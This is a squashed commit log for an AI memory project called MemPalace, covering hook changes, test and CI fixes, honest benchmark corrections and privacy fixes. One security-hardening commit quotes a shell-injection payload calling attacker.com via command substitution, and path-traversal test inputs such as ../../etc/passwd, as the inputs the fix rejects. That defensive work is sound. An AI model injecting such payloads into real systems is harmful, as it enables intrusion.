* fix: stop hooks from making agents write in chat — save tokens The save hook and precompact hook were telling the agent to write diary entries, add drawers, and add KG triples IN THE CHAT WINDOW. Every line written stays in conversation history and retransmits on every subsequent turn — ~$1/session in wasted tokens. Fix: hooks now say "saved in background, no action needed" and use decision: allow instead of block. The agent continues working without interruption. All filing happens via the background pipeline. Also updated hooks README with: - Known limitation: hooks require session restart after install - Updated cost section: zero tokens, background-only Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use microsecond timestamp and full content hash in diary entry ID (#819) * fix: remove unused import 'main' from mempalace/__init__.py Removed the 'main' import from `mempalace/__init__.py` and updated `pyproject.toml` to point the script entry point directly to `mempalace.cli:main`. This ensures the CLI remains functional while improving code hygiene. Co-authored-by: igorls <[email protected]> * merge: full hardened stack + rewrite fact_checker around actual KG API Merges the full hardened stack (up through #791 drawer-grep) and turns fact_checker from "dead code hidden behind bare except" into an actually-working offline contradiction detector with tests. ## Dead paths the PR body advertised but the code never executed Both buried by a single outer ``except Exception: pass``: * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method; it has ``query_entity()``. The attribute error was silently swallowed and the entire KG branch always returned ``[]``. Now using ``kg.query_entity(subject, direction="outgoing")`` with proper handling of the ``predicate``/``object``/``current``/``valid_to`` fields the real API returns. * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only kwarg is ``db_path``. 
Passing ``palace_path`` raised TypeError, silently swallowed. Now computing the db_path correctly from ``<palace>/knowledge_graph.sqlite3``, matching the convention the MCP server already uses. ## Contradiction logic rewritten The previous ``if kg_pred in claim and fact.object not in claim`` only fired when text used the SAME predicate word as the KG fact — the exact opposite of the stated use case ("Bob is Alice's brother" when KG says "husband" would NOT have fired). Replaced with a proper parse → lookup → compare pipeline: * ``_extract_claims`` parses two surface forms ("X is Y's Z" and "X's Z is Y") into ``(subject, predicate, object)`` triples. * ``_check_kg_contradictions`` pulls the subject's outgoing facts and flags two classes: - ``relationship_mismatch`` when a current KG fact matches the same ``(subject, object)`` pair but with a different predicate. - ``stale_fact`` when the exact triple exists but is ``valid_to``-closed in the past. * Stale-fact detection is now implemented (the PR body claimed it; the old code silently didn't implement it). ## Performance fix — O(n²) → O(mentioned × n) ``_check_entity_confusion`` previously computed Levenshtein for every pair of registered names on every ``check_text`` call. For 1,000 registered names that's ~500K edit-distance calls per hook invocation. Now we first identify which registry names actually appear in the text (single regex scan), then only compute edit distance between mentioned and unmentioned names. Pinned by a test that asserts <200ms on a 500-name registry with zero mentions. Also: when *both* similar names are mentioned in the text, we no longer flag them — the user clearly knows they're different people. ## Shared entity-registry loader ``mempalace/miner.py`` already had an mtime-cached loader for ``~/.mempalace/known_entities.json``. fact_checker had a duplicate implementation that leaked file handles and ignored caching. 
Extended miner's cache to expose both the flat set (``_load_known_entities``) and the raw category dict (``_load_known_entities_raw``); fact_checker now imports the latter. No more double disk reads, no more handle leak. ## Tests — 24 cases in tests/test_fact_checker.py All three detection paths + both dead-code regressions: * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the correct KG constructor signature so the ``palace_path=`` bug can't come back. * ``test_relationship_mismatch_detected`` — the headline example from the PR body now actually fires. * ``test_stale_fact_detected`` — valid_to-closed triple is flagged. * ``test_current_fact_same_triple_is_not_flagged`` — no false positive on a still-valid match. * ``test_performance_bounded_by_mentioned_names`` — 500-name registry, zero mentions, <200ms. Regression for the O(n²) blowup. * ``test_no_false_positive_when_both_names_mentioned`` — Mila and Milla in the same text is fine. * Plus claim extraction, flatten_names shapes, CLI exit code, empty text handling, missing-palace graceful fallback, registry-dict shape support. 785/785 suite pass. ruff + format clean on CI-pinned 0.4.x. * Optimize entity detection with regex caching and pre-compilation - Use functools.lru_cache to cache compiled patterns for entity names. - Pre-compile static pronoun patterns into a single regex. - Remove redundant .lower() calls in score_entity loop. Co-authored-by: igorls <[email protected]> * docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787) Follow-up to #766 which covers version.py, pyproject.toml, README, CHANGELOG, and CONTRIBUTING. These 11 files still had the old org name in URLs: - website/ (VitePress config + 6 docs pages) - .claude-plugin/ (plugin.json repository, README marketplace command) - .codex-plugin/ (plugin.json URLs, README links) Author name fields are intentionally unchanged. 
* test: make diary state path assertion platform-neutral The Windows CI job failed on: assert '/.mempalace/state/' in str(state_path) because Windows uses ``\`` as the path separator, so the substring never matches. The behavior under test (state file lives outside the diary dir, under ``~/.mempalace/state/``) is already correct on both platforms — only the assertion was Unix-only. Switch to ``state_path.parent`` comparisons that work on any OS. * test: serialize mine_lock concurrency test with multiprocessing The macOS CI job failed ``test_lock_blocks_concurrent_access`` because ``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads in the same process both acquire even when they open their own file descriptors. The test passed on Linux (per-FD flock) and Windows (per-FD ``msvcrt.locking``) but was never actually exercising the lock's real contract. ``mine_lock`` is designed to serialize multi-*agent* access — i.e., separate processes, not threads. Switch the test to ``multiprocessing.get_context('spawn')`` with a module-level worker (so the spawn pickles cleanly) so it: 1. reflects the actual use case (one lock per mining process); 2. passes on all three OSes without flock-semantics branching; 3. catches real regressions (a broken lock would now let both processes through, exactly what we care about). Hold time bumped to 0.3s and the "wait until p1 acquires" delay to 0.2s to tolerate spawn's higher startup latency on macOS/Windows. * test: verify mine_lock via disjoint critical-section intervals The previous revision used multiprocessing but still relied on timing ("second process waited at least N seconds") which flakes on CI where spawn overhead eats into the hold window. Linux CI observed the second process report a 0.088s wait — below the 0.1s threshold — even though the lock behavior was correct; spawn was just slow enough that the first process had nearly finished holding when the second got past its own spawn. 
Switch to effect-based verification: each worker logs its [enter_time, exit_time] inside the critical section, and the test asserts the two intervals are disjoint after sorting. A broken lock would produce overlapping intervals regardless of spawn latency; a working lock cannot. Also removed the mp.Queue since we no longer pass timing data back. * Fix: ruff format with CI-pinned version (0.4.x) * fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835) * fix: README audit — match every claim to shipped code + add hall detection TDD audit: wrote 42 tests verifying README claims against codebase. Fixed all 7 failures: 1. Tool count: 19 → 29 (10 tools were undocumented) 2. Added tool table rows for tunnels, drawer management, system tools 3. Version badge: 3.1.0 → 3.2.0 4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers" 5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py) 6. pyproject.toml version in project structure: v3.0.0 → v3.2.0 7. Hall detection: added detect_hall() to miner.py — drawers now tagged with hall metadata so palace_graph.py can build hall connections New code: - miner.py: detect_hall() — keyword scoring against config hall_keywords, writes hall field to every drawer's metadata - tests/test_hall_detection.py — 12 TDD tests (written before code) - tests/test_readme_claims.py — 42 TDD tests verifying README accuracy 859/859 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: resolve ruff lint — unused imports and variables Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * style: ruff format with CI-pinned 0.4.x Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use conftest fixtures in hall tests for Windows compat Windows CI fails with NotADirectoryError when ChromaDB tries to write HNSW files in short-lived TemporaryDirectory. 
Use conftest palace_path and tmp_dir fixtures instead — same pattern as all other tests that touch ChromaDB. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: address Igor's review — convo_miner halls, cached config, markdown typo TDD: wrote tests for convo_miner hall metadata and config caching BEFORE verifying the code changes. 1. README markdown typo: extra ** in wake-up token row (line 195) 2. convo_miner.py: added _detect_hall_cached() — conversation drawers now get hall metadata (was missing, Igor caught it) 3. miner.py + convo_miner.py: cached hall_keywords at module level so config.json isn't re-read per drawer during bulk mine 4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching 861/861 tests pass. ruff clean. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> --------- Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * fix(website): update vitepress base url for custom domain * chore(release): bump version strings to 3.3.0 and curate CHANGELOG Prepare develop for the 3.3.0 release cycle. Version bumps: - mempalace/version.py: 3.2.0 -> 3.3.0 - pyproject.toml: 3.2.0 -> 3.3.0 - README.md: pyproject.toml label and shields.io badge - uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras) CHANGELOG.md: - Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12 (v3.2.0 was tagged on that date but the release flip was never made) - Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits since v3.2.0: closet layer, BM25 hybrid search, entity metadata, diary ingest, cross-wing tunnels, drawer-grep, offline fact checker, LLM-based closet regen, hall detection, cosine-distance fix, multi-agent locking, README audit, etc. 
- Adopt Keep a Changelog + SemVer framing - Add version compare reference links at the bottom - Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace --------- Co-authored-by: MSL <[email protected]> Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> Co-authored-by: eblander <[email protected]> Co-authored-by: shafdev <[email protected]> Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: mvalentsev <[email protected]> Co-authored-by: Dominique Deschatre <[email protected]> * ci: serve docs from develop only Docs deploy to GitHub Pages from develop for faster iteration cycles. Main was failing the deploy step with "Branch 'main' is not allowed to deploy to github-pages due to environment protection rules" on every release merge (v3.2.0, v3.3.0) — noise without signal, since docs weren't meant to serve from main anyway. Removes main from both the push trigger and the deploy-job guard. Develop continues to deploy as before; manual dispatch still works. * fix(status): paginate metadata fetch to support large palaces `col.get(limit=total)` causes SQLite "too many SQL variables" on palaces with >10k drawers (#802) and on older versions the hardcoded limit=10000 silently truncated the count (#850). Paginate in 5k batches using offset and aggregate wing/room counts incrementally. Also use `col.count()` for the header instead of `len(metas)` so the displayed total is always correct. Tested on a 122,686-drawer palace. Fixes #850 Related: #802, #723 * refactor: route all chromadb access through ChromaBackend Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. 
Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules. * fix: update stale org URLs in pyproject.toml and README (#787) * fix: harden hooks against shell injection, path traversal, and arithmetic injection save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace/mempalace#809 * fix: add logging on rejected transcript paths and platform-native path test - _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log - Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform - Add test verifying the warning log is emitted on rejection Refs: MemPalace/mempalace#809 * Increase visibility of fake website caution Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README. 
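The transcript-path validation described in the hooks-hardening commits above might be sketched like this — a hedged illustration; the real ``_validate_transcript_path()`` in hooks_cli.py may differ in details such as Windows-native separator handling:

```python
from pathlib import PurePath

ALLOWED_SUFFIXES = {".jsonl", ".json"}

def validate_transcript_path(raw: str) -> bool:
    """Reject empty paths, traversal components, and non-transcript extensions."""
    if not raw:
        return False
    p = PurePath(raw)
    if ".." in p.parts:                    # path traversal attempt
        return False
    return p.suffix in ALLOWED_SUFFIXES    # only .jsonl / .json transcripts
```

Callers such as a message-counting helper can return 0 (and log a warning) on a False result instead of opening arbitrary files.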
* fix: use permissive validator for KG entity values (closes #455) sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names. * chore: bump plugin manifests to 3.3.0 and fix owner URL Aligns marketplace.json and both plugin.json files with version.py / pyproject.toml (already at 3.3.0) so `/plugin update` reflects the v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps. Also updates marketplace.json `owner.url` from the stale github.com/milla-jovovich path to the current github.com/MemPalace org. Refs #874 * ci: add version guard to catch tag/manifest drift Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the single source of truth per CLAUDE.md), and fails PRs that touch any version file without keeping all five in sync (pyproject.toml, version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json, .codex-plugin/plugin.json). Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0 tags all landed pointing at commits that still carried manifest version 3.0.14, blocking `/plugin update` for end users. Refs #874 * ci: let semver pre-release tags bypass strict manifest match Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as internal/staging builds. They skip the tag-vs-manifest check because pre-releases do not flow to end users via `/plugin update`, which reads the manifest on the default branch. Stable tags `vX.Y.Z` still require all five version sources to match exactly, so the protection against the #874 drift remains intact. The cross-file consistency check on PRs is unchanged — all manifests must still agree with mempalace/version.py whenever any version file moves. 
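The tag-guard logic described in the two CI commits above reduces to a small check — sketched here under the assumption that the workflow compares the pushed tag against mempalace/version.py; the actual guard script also cross-checks the four manifest files:

```python
import re

_PRERELEASE = re.compile(r"^v\d+\.\d+\.\d+-")  # vX.Y.Z-* → internal/staging

def check_tag(tag: str, manifest_version: str) -> bool:
    """Stable vX.Y.Z tags must match the manifest exactly;
    pre-release tags bypass the check (they never reach /plugin update)."""
    if _PRERELEASE.match(tag):
        return True
    return tag == f"v{manifest_version}"
```

This is exactly the #874 failure mode: `check_tag("v3.1.0", "3.0.14")` fails the push, while `v3.4.0-rc1` sails through regardless of manifest state.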
* fix: ship CNAME in Pages artifact to pin custom domain Adds website/public/CNAME containing `mempalaceofficial.com` so the VitePress build output always includes /CNAME in the Pages artifact. Without this, the custom-domain setting is only held in the repo's Pages API config — if it ever drifts (manual edit, org move, workflow change), the site reverts to <org>.github.io with no record in source. Note: this does not fix the current site outage. The root cause is DNS — mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub Pages IPs. That has to be fixed at the registrar. This commit is the belt-and-suspenders so that once DNS is back, the domain is pinned in source and the next workflow refactor can't accidentally drop it. * docs: tighten SECURITY.md with real version policy and GHPVR-only channel Builds on @Yorji-Porji's draft by fixing three issues before it lands: - Replace the `< 1.0.0` placeholder table with MemPalace's actual support policy: current major (3.x) receives fixes, 2.x and earlier do not. - Remove the `[Insert Maintainer Email Here]` placeholder and the email fallback. GitHub Private Vulnerability Reporting is enabled on this repo; the policy points there exclusively so there is no risk of a researcher emailing a dead address. - Drop the meta-note ("Adjust the table above…") that was an instruction to the maintainer, not policy text. Structure, triage timelines, and credit language are kept as drafted. * fix: allow mining directories without local mempalace.yaml When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes #14. 
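The missing-yaml fallback from the #14 fix above can be sketched as follows — field names and the config shape are assumptions from the commit message; the real loader parses the yaml and (per the follow-up commit) warns on stderr:

```python
from pathlib import Path

def load_mine_config(source_dir: str) -> dict:
    """Return the local config if present; otherwise a default so mining
    never sys.exit(1)s on an un-initialized directory."""
    d = Path(source_dir)
    for name in ("mempalace.yaml", "mempal.yaml"):
        cfg = d / name
        if cfg.exists():
            return {"path": str(cfg)}   # placeholder: parse the yaml here
    # No config: wing defaults to the directory basename, room to "general"
    return {"wing": d.name, "room": "general"}
```

Note the basename-collision caveat the stderr warning calls out: two unrelated directories named `api/` would default to the same wing.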
* fix: remove unused sys import * fix: send missing-yaml warning to stderr and flag basename collisions Addresses review feedback on #604: - Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere. - Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml. * docs: name official domain and specific impostors in scam alert Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in #877). Also update the April 11 follow-up section to match so the two notices no longer contradict each other. * perf: optimize regex compilation in entity extraction Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution. Co-authored-by: igorls <[email protected]> * feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871) export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat export MEMPAL_VERBOSE=false → silent background save (default) Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work. TDD: tests written first, failed, code fixed, tests pass. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * feat: add VSCode devcontainer matching CI environment Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml. 
Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x. * fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph * fix: replace invalid 'decision: allow' with {} in hooks Closes #872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: add missing self._lock to KnowledgeGraph.close() TDD: test first, failed, fixed, passed. Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock. Closes #883. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * benchmarks: add --llm-backend ollama for non-Anthropic rerank The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions. Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency. 
Both longmemeval_bench.py and locomo_bench.py: - llm_rerank*() gain backend= / base_url= kwargs - CLI: --llm-backend {anthropic,ollama}, --llm-base-url - API key required only when backend=anthropic (diary/palace modes still require it) - Parse last integer in response (reasoning models emit multi-int output) - Fallback to message.reasoning when content is empty - Raise max_tokens to 1024 for reasoning models * benchmarks: apply ruff-format to llm_rerank (trivial line wrap) * benchmarks: add v3.3.0 reproduction results + 50/450 split Addresses #875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split). Scorecard — all reproduce exactly: LongMemEval raw R@5 96.6% (500/500) ✅ hybrid_v4 held-out 450 R@5 98.4% (442/450) ✅ hybrid_v4 + minimax rerank R@5 99.2% (496/500) * hybrid_v4 + minimax rerank R@10 100.0% (500/500) * LoCoMo (session, top-10) raw 60.3% (1986q) ✅ hybrid v5 88.9% (1986q) ✅ ConvoMem all-categories (250 items) 92.9% ✅ MemBench all-categories (8500) 80.3% ✅ * The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test. The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end. * docs: slim README and move corrections/notices to docs/HISTORY.md Addresses #875. The previous README was 755 lines mixing six purposes (scam alert, hero, two mea-culpa notes, install guide, architecture explainer, API reference, file map). 
Rework it as a pure entry point: what MemPalace is, how to install, honest benchmark numbers, links to the website for concept/architecture documentation. Key content changes: - Drop the "highest-scoring AI memory system ever benchmarked" framing. - New tagline: "Local-first AI memory. Verbatim storage, pluggable backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids naming a specific vector-store implementation since the backend is pluggable (see mempalace/backends/base.py). - Remove the cross-system comparison table. Retrieval recall (R@5) and end-to-end QA accuracy are different metrics and are not comparable; placing MemPalace's R@5 next to competitor QA accuracy under a single column header was a category error. - The "100%" LongMemEval headline is no longer the lead. The honest held-out figure is 98.4% R@5 on 450 unseen questions. The rerank pipeline reaches >=99% with any capable LLM (reproduced with Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level, not model-specific. - Benchmark reproduction commands now reference the correct repo (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch). New file: docs/HISTORY.md as the canonical home for post-launch corrections, public notices, and retractions. Contains verbatim: - 2026-04-14 note on this rewrite (links to #875) - 2026-04-11 impostor-domain notice (moved from README header) - 2026-04-07 "A Note from Milla & Ben" (moved from README body) README keeps a one-line scam-alert callout that links to docs/HISTORY.md for the full timeline. * docs(website): align mempalaceofficial.com with honest benchmarks Part of #875. Bring the VitePress site into line with the new README and the reproducibility scorecard: drop category-error comparisons, drop retracted claims, retain only metrics and caveats that survive audit. website/index.md - New tagline matches README (local-first, verbatim, pluggable backend, 96.6% R@5 raw, zero API calls). 
- Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra 94.87% / Mem0 ~85%" comparison table with a single honest table showing MemPalace's own retrieval-recall numbers (raw 96.6%, hybrid v4 held-out 98.4%). Add an explicit sentence explaining why we no longer publish a cross-system table on the landing page (retrieval recall vs QA accuracy are different metrics). - Soften the "ChromaDB-powered vector search" feature blurb to be backend-agnostic, since the retrieval layer is pluggable. website/reference/benchmarks.md - Full rewrite of the retrieval-recall tables. No more "100%" headline; honest held-out 98.4% R@5 replaces it. Added the model-agnostic rerank result (99.2% R@5 / 100% R@10 with minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific. - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row. With per-conversation session counts of 19-32 and top_k=50, the retrieval stage returns every session by construction — the number measures an LLM's reading comprehension, not retrieval. - Drop the cross-system comparison tables. Link out to each project's own research page (Mastra, Mem0, Supermemory) for their published numbers and metric definitions. - Rewrite reproduction commands to use the correct repository and demonstrate the new --llm-backend ollama flag. website/concepts/the-palace.md - Remove the "+34%" row / paragraph. Wing/room filtering is standard metadata filtering in the vector store, not a novel retrieval mechanism — the April-7 note already retracted that framing; this finishes the retraction on the website where it had remained. website/guide/searching.md - Same treatment for "34% retrieval improvement". Reframe as operational scoping, not a novel boost. website/reference/contributing.md - Update the "palace structure matters" bullet to reflect the same framing: scoping-not-magic. 
website/concepts/knowledge-graph.md - Replace the MemPalace-vs-Zep feature matrix with a short "related work" note that links to Zep's own documentation for authoritative details on their deployment model. Avoids claims we cannot verify at source. * docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG Remaining in-repo surfaces carrying the same retracted or broken claims as the public pages fixed in the previous two commits. CONTRIBUTING.md - "Palace structure matters ... 34% retrieval improvement" → reframed as scoping (same rewording applied to the website equivalents). benchmarks/BENCHMARKS.md - Add a prominent "Important caveat" block at the top of the "Comparison vs Published Systems" table explaining that R@5 (retrieval recall) and QA accuracy are different metrics, with citations to Mastra, Mem0, and Supermemory's own published methodology pages. Annotate the specific competitor rows whose numbers are QA accuracy, not retrieval recall. - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4 → 100 step was tuned on 3 specific wrong answers (already disclosed further down in the doc under "Benchmark Integrity"); the honest hybrid figure is held-out 98.4%. - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points at anything; now `MemPalace/mempalace`. benchmarks/README.md + benchmarks/HYBRID_MODE.md - Same clone-URL fix applied. CHANGELOG.md - Add a ### Documentation entry under [Unreleased] v3.3.0 that names #875 and summarises the scope of the rewrite. * docs+tests: fix CI after README slim (#875) The regression-guard tests added in #835 were pinned to the old README shape (tool table + file-reference table). When #897 slimmed the README and moved that content to the website, three tests started failing: TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict TestNoUnlistedTools.test_no_undocumented_tools TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless Changes in this commit: 1. 
Update the 3 tests to track the new canonical docs surfaces - Tool list -> website/reference/mcp-tools.md (tests parse `### \`mempalace_xxx\`` headings instead of markdown table rows). - dialect.py lossless disclaimer -> website/reference/modules.md (any line mentioning dialect.py must not also say "lossless"). 2. Fix the website to make "no undocumented tools" true Add the 10 tools that existed in TOOLS but were missing from website/reference/mcp-tools.md (create_tunnel, delete_tunnel, follow_tunnels, list_tunnels, get_drawer, list_drawers, update_drawer, hook_settings, memories_filed_away, reconnect). Page header now correctly says "all 29 MCP tools". 3. Align pre-commit ruff pin to match CI (0.4.x) .pre-commit-config.yaml was pinning ruff v0.9.0, while .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two formatters produce incompatible output (e.g. v0.9.0 reformats `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects), which would cause the pre-commit hook to modify files that CI then flags as unformatted. Pinning the hook to v0.4.10 keeps the dev loop and CI in lock-step. Full suite: 887 passed, 0 failed. * fix: address i18n review issues from PR #718 Three issues flagged by bensig on the i18n PR before merge: 1. ko.json: status_drawers used {drawers} instead of {count}, causing the Korean UI to show the raw template string instead of the actual drawer count. All other 7 languages use {count}. 2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py with a sys.path.insert hack. Moved to tests/test_i18n.py per the project convention in AGENTS.md. 3. Dialect.from_config() passed lang=config.get("lang") which defaults to None, causing __init__ to inherit whatever language was loaded earlier via module-level state. Now defaults to "en" explicitly so from_config is deterministic regardless of prior load_lang() calls. Added two regression tests for the ko.json fix and the state leak. 
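The ko.json bug above ({drawers} vs {count}) is the kind of drift a cross-locale placeholder check catches mechanically — a sketch, assuming locale files deserialize to flat key→template dicts (the real regression tests may assert differently):

```python
import string

def placeholders(template: str) -> set:
    # Extract format-field names via the stdlib parser, e.g. "{count}" → {"count"}
    return {f for _, f, _, _ in string.Formatter().parse(template) if f}

def check_locales(en: dict, other: dict) -> list:
    """Return keys whose placeholders diverge from the English template."""
    return [k for k, tmpl in other.items()
            if placeholders(tmpl) != placeholders(en.get(k, tmpl))]

# The pre-fix state: ko used {drawers} where the other 7 languages use {count}
EN = {"status_drawers": "{count} drawers"}
KO_BROKEN = {"status_drawers": "{drawers} drawers"}
```

Running this over all 8 locale files would have flagged status_drawers before it shipped.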
* docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862)

Fixes #210. The CLI requires a positional <dir> argument. Previous docs emphasized that init 'sets up ~/.mempalace/' which misled users into expecting no arguments. Now the docs show <dir> is required, offer '.' as the usage for the current directory, and reword the description so the project-directory scan is listed first.

* fix: make entity_registry.research() local-only by default (#811)

* fix: make entity_registry.research() local-only by default

research() previously called _wikipedia_lookup() unconditionally, sending entity names to en.wikipedia.org on every uncached lookup. This violates the project's local-first and privacy-by-architecture principles documented in CLAUDE.md.

Changes:
- research() now returns "unknown" for uncached words by default
- New allow_network=True parameter required for Wikipedia lookups
- Wikipedia 404 now returns "unknown" instead of asserting "person" with 0.70 confidence, preventing entity registry poisoning
- Added privacy warning docstring to _wikipedia_lookup()
- Added tests for local-only default, opt-in network, 404 handling, and cache-not-persisted-on-local-only behaviour

Refs: MemPalace/mempalace#809

* fix: improve research() cache read path and deduplicate test mocks

- Use .get() instead of .setdefault() for cache reads in research() so the local-only path never mutates _data unnecessarily
- Move .setdefault() to the network-write path only
- Use result.setdefault() for word/confirmed keys to ensure consistent return shape across all _wikipedia_lookup error paths
- Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON constant shared by 3 test functions

* fix: return empty status instead of error on cold-start palace (#830) (#831)

tool_status() called _get_collection() with the default create=False, which throws when the ChromaDB collection does not exist yet (valid palace, zero drawers).
The exception was swallowed and status returned "No palace found" even though init had completed successfully. Switching to create=True bootstraps an empty collection on first status call, matching what the write path already does. Fix suggested by @hkevinchu in the issue.

* fix(searcher): guard against empty ChromaDB query results (#195) (#865)

Fixes #195. When ChromaDB returns no documents (empty palace, or wing/room filter that excludes everything), it returns the shape:

{"documents": [], "metadatas": [], "distances": []}

Indexing `results["documents"][0]` blindly raises IndexError instead of the expected 'no results' response. Affected: searcher.search(), searcher.search_memories() (drawer + closet branches plus the total_before_filter aggregate), and Layer3.search() / Layer3.search_raw().

Adds a tiny private helper `searcher._first_or_empty(results, key)` that safely extracts the inner list, returning [] for any of: missing key, empty outer list, [None], or [[]]. layers.py imports the same helper to avoid duplicating the guard.

Tests: tests/test_empty_chromadb_results.py covers all observed shapes plus a documentation-style test that pins the original IndexError so future readers understand why the helper exists.

* fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866)

Partially addresses #185. `mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into the project root. When <dir> is a git repository, those files have no default protection and risk being committed by accident — the loudest concern in the original report.

This PR adds `_ensure_mempalace_files_gitignored()` which runs at the end of cmd_init: if <dir>/.git exists, append the two filenames to .gitignore (creating it if necessary) under a clearly-marked block.
The helper is conservative:
- only runs when <dir>/.git is present (no-op for non-git projects)
- skips entries already present (no duplicates)
- preserves existing .gitignore content
- handles files without trailing newlines

